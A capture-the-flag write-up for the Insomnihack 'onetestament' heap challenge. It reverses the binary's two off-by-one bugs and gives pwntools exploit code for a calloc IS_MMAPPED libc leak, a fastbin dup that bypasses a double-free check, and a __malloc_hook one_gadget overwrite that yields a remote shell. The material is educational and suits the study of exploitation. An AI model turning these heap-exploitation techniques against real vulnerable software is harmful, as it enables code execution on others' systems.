Tags: calloc heap pwn
Rating: 5.0
Original writeup with images and files
What will be your last wish ;-)
nc onetestament.insomnihack.ch 6666
We are provided with a binary file and a stripped libc.
We unfortunately didn't solve this during the competition =/
did 90% of the reversing work and all annotations in the files provided below are hers.
Please note, the binary's base address has been set to 0x555555554000
in Ghidra because this matches the base address used by GDB and makes reversing easier (at least for me).
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
All protections except stack canaries are in place, but since this is a heap challenge, the presence of canaries or lackthereof doesn't affect us.
After running the binary, we have the following 5 menu options:
Looks like a classic heap CTF challenge.
When we create a new testament, we can choose one of four types; depending on the type, the size of the chunk to be allocated is different:
We can allocate chunks with the following sizes:
All types except type 4 assign fast-sized chunks. Please also note the last line which shows that calloc
is being used for allocation.
After choosing the testament type, we can fill the testament with our input. Finally, the contents of the newly-created testament are printed out:
It appears that leaking data right after allocation might be tricky because calloc
is zero'ing out user data right after allocation.
We can edit a testament after creating it, but the name of the functionality is misleading since we can only increment one byte by 1 in a given testament.
// chunk offset to edit
printf("Please enter your testament content: ");
chunk_offset = readOption();
if (check < chunk_offset) {
printMessage("Nope, impossible!");
chunk_ptr = (char *)(chunk + (ulong)chunk_offset);
// increment byte at offset by 1
*chunk_ptr = *chunk_ptr + '\x01';
There is an off-by-one bug here where we can supply the size of the chunk being edited as the offset and increment the byte that corresponds to the next chunk's size field.
We can delete testaments which essentially frees them. There is also a pseudo double-free check being carried out:
index = readOption(); // testament index to try and free
if (9 < index) {
printMessage("Oops! not a valid index");
__ptr = *(void **)(&testaments + (ulong)index * 8);
if (__ptr == NULL) {
printMessage("Impossible! No testaments");
switch(index) {
case 0:
if (doubleFreeCheck0 == 0) {
printMessage("Impossible to delete again this testament");
else {
doubleFreeCheck0 = 0;
case 1:
if (doubleFreeCheck1 == 0) {
printMessage("Impossible to delete again this testament");
else {
doubleFreeCheck1 = 0;
case 2:
if (doubleFreeCheck2 == 0) {
printMessage("Impossible to delete again this testament");
else {
doubleFreeCheck2 = 0;
// <-- code for remaining indexes removed for brevity -->
Basically, depending on the index chosen, a corresponding global variable is checked; if the variable is 0, the testament has already been free'd hence the program exists. If the variable is non-zero, the testament is freed and the variable is set to 0 to prevent additional frees.
However, there is another one-byte overflow in the readoption()
function, where we can overflow the optionBuf
variable and overwrite the doubleCheck4
int readOption(void)
int idx;
idx = atoi(&optionBuf); //optionBuf is only 4 bytes
if (idx < 0) {
idx = 0;
return idx;
Using this bug, we can achieve a double-free only with the testament at index 4 (i.e. the 5th chunk allocated).
We have two off-by-one bugs to work with that can result in:
The libc version is 2.23, so there is no tcache
present. We also need some way to leak addresses, but the only functionality that prints testament data is the Create Testament functionality which uses calloc
Fortunately / unfortunately, the day before the CTF I was finishing up the amazing HeapLab Part 2 course on Udemy by Max Kamper and was reading one of the annoucements where Max wrote about one of the students who used a trick in one of the course's challenge binaries to leak addresses when calloc
was being used.
The trick revolves around a chunk's IS_MMAPED
flag being set; if present, calloc
will not zero out the chunk's user data after allocation because it assumes the chunk has been allocated via mmap()
which also zeroes out data.
The least significant nybble of a chunk's size field is not taken into account for its size. Rather, it's used to set various flags. These are:
Hence, we can use the off-by-one bug in the Edit Testament functionality to increase the size of a free'd chunk's size field, setting the IS_MMAPED_FLAG
. This means that if another chunk with the same size is allocated, calloc
will not zero out any data already present, and the Create Testament functionality will print out residual data. This can be used to leak a libc address:
# =-=-=- Set IS_MMAPPED_FLAG =-=-=-
# Create 0x20-sized chunk to overflow
overflow = create(1, 'overflow')
# create 0x90-sized chunk to leak and free it into unsortedbin
# create 0x70-sized top chunk guard to protect against
# consolidation and use later for fastbin dup
leaker = create(4, 'leaker')
guard = create(3, 'guard')
edit(overflow, '24')
# Assign new 0x90-sized chunk and leak libc
# we're leaking unsortedbin BK (NOT fd)
leaker, libc_leak = create(4, 'leakerr', leak=True)
libc_leak = uu64(libc_leak.strip())
libc.address = libc_leak - 0x3c4b78
log_addr('Libc leak', libc_leak)
log_addr('Libc base', libc.address)
And we successfully leak a libc address on the remote binary and resolve its libc base address.
[+] Opening connection to onetestament.insomnihack.ch
[*] Libc leak: 0x7f91f59acb78
[*] Libc base: 0x7f91f55e8000
Now that we have a libc address, we can leverage the second off-by-one bug to carry out a fastbin dup via a double-free. We just need to make sure we overflow the optionBuf
global variable to bypass the pseudo double-free check by sending '00004'
as the chunk index.
# =-=-= Helper =-=-=--=
def delete(idx, overflow=False):
sla(b'choice: ', b'4')
# overflow optionBuf to bypass double-free check
if overflow:
payload = str(idx).encode()
payload = payload.rjust(5, b'0')
# payload = '00004'
log.info(f'Bypassing double-free check with: {payload}')
sla(b'index: ', payload)
sla(b'index: ', str(idx).encode())
# =-=-=- Fastbin-dup =-=-=-
# Assign 0x70-sized chunk
dup = create(3, 'dup')
log.info(f'dup index: {dup}')
# double free
delete(dup, overflow=True)
Now the fastbins list look like this, meaning we've successfully performed a fastbin dup.
pwndbg> fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x55555575a120 —▸ 0x55555575a0b0 ◂— 0x55555575a120
0x80: 0x0
All that's left is to hijack the flow of execution and drop a shell remotely. Because we're dealing with traditional fastbins, we need to account for a size-field integrity check when linking fake chunks into the fastbins. Hence, we need to make sure our chunks used for our fastbin dup are 0x70-sized because we can forge fake chunks with size 0x7f
near the __malloc_hook
. Pwndbg has a nice command to automate this: find_fake_fast
pwndbg> find_fake_fast &__malloc_hook
Fake chunk | Allocated chunk | PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA
Addr: 0x7ffff7dd1aed
prev_size: 0xfff7dd0260000000
size: 0x7f
fd: 0xfff7a92ea0000000
bk: 0xfff7a92a7000007f
fd_nextsize: 0x7f
bk_nextsize: 0x00
can be used as the address of our fake chunk. Calculating the distance from the __malloc_hook
pwndbg> distance &__malloc_hook 0x7ffff7dd1aed
0x7ffff7dd1b10->0x7ffff7dd1aed is -0x23 bytes
After linking our fake chunk at the above address into the fastbins, we can finally overwrite __malloc_hook
with a one_gadget (since we don't directly control arguments to calloc
). I used the second one:
# Get pointer to fake 0x70-sized chunk near __malloc_hook
# by overwriting fd of first fast chunk
create(3, p64(libc.sym.__malloc_hook - 0x23))
# move pointer to fake chunk to head of fastbin
create(3, 'junk')
create(3, 'junk')
# overwrite __malloc_hook using our fake chunk
# accounting for the fact that malloc returns pointers
# to chunk headers but operates on user data,
# That's why we use 0x13 instead of 0x23
create(3, p8(0) * 0x13 + p64(libc.address + 0x4527a))
# trigger one-gadget
sla(b'choice: ', b'1')
sla(b'choice: ', b'1')
# =-=-=-==-=-=-=-=-=
One-gadgets for reference:
# One gadgets
0x45226 execve("/bin/sh", rsp+0x30, environ)
rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)
[rsp+0x30] == NULL
0xf03a4 execve("/bin/sh", rsp+0x50, environ)
[rsp+0x50] == NULL
0xf1247 execve("/bin/sh", rsp+0x70, environ)
[rsp+0x70] == NULL
[+] Opening connection to onetestament.insomnihack.ch on port 6666: Done
[*] Libc leak: 0x7fc41758eb78
[*] Libc base: 0x7fc4171ca000
[*] dup index: 4
[*] Bypassing double-free check with: b'00004'
[*] Switching to interactive mode
$ id
uid=1000(onetestament) gid=1000(onetestament) groups=1000(onetestament)
$ cat flag
My script was crashing every time I was trying to get a pointer for __mallok_hook. Now I know it was because of the fastbins size-field integrity check.
Thank you for the very clear writeup.